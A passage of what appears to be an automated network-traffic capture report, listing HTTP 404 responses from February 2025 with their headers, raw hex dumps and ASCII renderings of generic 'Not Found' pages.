d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f5Tn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(Y<;0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 04:08:28 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FZAKk84yIX58EpAa2Mb%2F59QPkFpjYSo3LILlKlbdWtIzozStKn%2FAUFJORst5MZV64hzc4mwcY58Usk4Vhj9gLcFRNhvNuUkOL4IENaETo4mDyx8CZjG%2BAuuAiucVo0p%2FQw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913b27fac97d4234-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1727&min_rtt=1727&rtt_var=863&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10825&delivery_rate=0&cwnd=170&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a Data Ascii: eaTn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(bY<;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 04:08:31 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=scfZjafKw7EZQwnQbDP2ZU76fUq3P%2FuyjWJrdg56YhympdrmheZ8vItIzkoFnF6IK3UEdzfLCR0vo4R0Sn811mlPKc3%2BD%2Fl%2Fldg%2BtJ%2FoGEGuDtDPWH7EloszB0RP4IYyWg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913b280aad38f795-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2014&min_rtt=2014&rtt_var=1007&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=460&delivery_rate=0&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 04:08:37 GMTServer: ApacheContent-Length: 815Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 50 6f 70 70 69 6e 73 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 4f 6f 70 73 2c 20 54 68 65 20 50 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 63 61 6e 27 74 20 62 65 20 66 6f 75 6e 64 21 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 53 65 61 72 63 68 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 09 3c 61 20 68 72 65 66 3d 22 2f 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 72 72 6f 77 22 3e 3c 2f 73 70 61 6e 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Poppins:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 04:08:39 GMTServer: ApacheContent-Length: 815Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 50 6f 70 70 69 6e 73 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 4f 6f 70 73 2c 20 54 68 65 20 50 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 63 61 6e 27 74 20 62 65 20 66 6f 75 6e 64 21 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 53 65 61 72 63 68 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 09 3c 61 20 68 72 65 66 3d 22 2f 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 72 72 6f 77 22 3e 3c 2f 73 70 61 6e 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Poppins:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 04:08:42 GMTServer: ApacheContent-Length: 815Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 50 6f 70 70 69 6e 73 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 4f 6f 70 73 2c 20 54 68 65 20 50 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 63 61 6e 27 74 20 62 65 20 66 6f 75 6e 64 21 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 53 65 61 72 63 68 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 09 3c 61 20 68 72 65 66 3d 22 2f 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 72 72 6f 77 22 3e 3c 2f 73 70 61 6e 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Poppins:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 04:08:44 GMTServer: ApacheContent-Length: 815Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 50 6f 70 70 69 6e 73 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 4f 6f 70 73 2c 20 54 68 65 20 50 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 63 61 6e 27 74 20 62 65 20 66 6f 75 6e 64 21 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 53 65 61 72 63 68 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 09 3c 61 20 68 72 65 66 3d 22 2f 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 72 72 6f 77 22 3e 3c 2f 73 70 61 6e 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Poppins:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 04:09:17 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UjKpcq3znFrHKDv0h0TC4yKcTz75n5eNrV92uzryjt0GtoWA6pcop%2Ff7XVrlLann3Rpn2XH3CV4%2Bp9Criv964Qw6MqISXJUENiFaC6kBzUW5BEherm%2FjALxh7jzxponIRPYnBdc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913b292aeaa0c3ff-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1672&min_rtt=1672&rtt_var=836&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=735&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 e2 e2 e2 02 00 00 00 ff ff 0d 0a Data Ascii: 13
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 04:09:19 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OoYHJKOSnkVUJYJfNP62U0u6%2BAIVrHnaCkYUaaLKjcK0itD5VkPOn6ZhHI9IchJjv29ialZVNUvq2ROlkrLkQbpDodaK5HEqsAi3b8pxqWBxKQhsbykKdLjY3a3am71smy%2BIHXg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913b293acc26efa5-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1757&min_rtt=1757&rtt_var=878&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=755&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 e2 e2 e2 02 00 00 00 ff ff 0d 0a Data Ascii: 13
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 04:09:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H0vHPRcm4clfXMZkji%2BG8jMcMLEE%2FFnZSQjU3UsoXhI4j19%2B21nD03s52IXXOpyV0Qx2R9W8xBbwXPNquirFZ8ZvqGR9CSeJPa7fllPl8BLOLcQjmtSgO04f3EyDufKdd6tav3g%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913b294ab8e78c84-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2028&min_rtt=2028&rtt_var=1014&sent=3&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10837&delivery_rate=0&cwnd=174&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 e2 e2 e2 02 00 00 00 ff ff 0d 0a Data Ascii: 13
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 04:09:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SO%2F6%2FoEcEXzxMFkpylackeuro2R1OWyZ4YiwXUnSyx8sdcf0Stkzgrc2KSa24%2ByVm4oqRw%2BlXeuCnb43sy%2B5E5M5zEz3S%2F4H8aJ%2B4VGWkb4yUcaHJgSUdwAadwp6LCuMQXfLyDI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913b295aaac67cfa-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1736&min_rtt=1736&rtt_var=868&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=464&delivery_rate=0&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
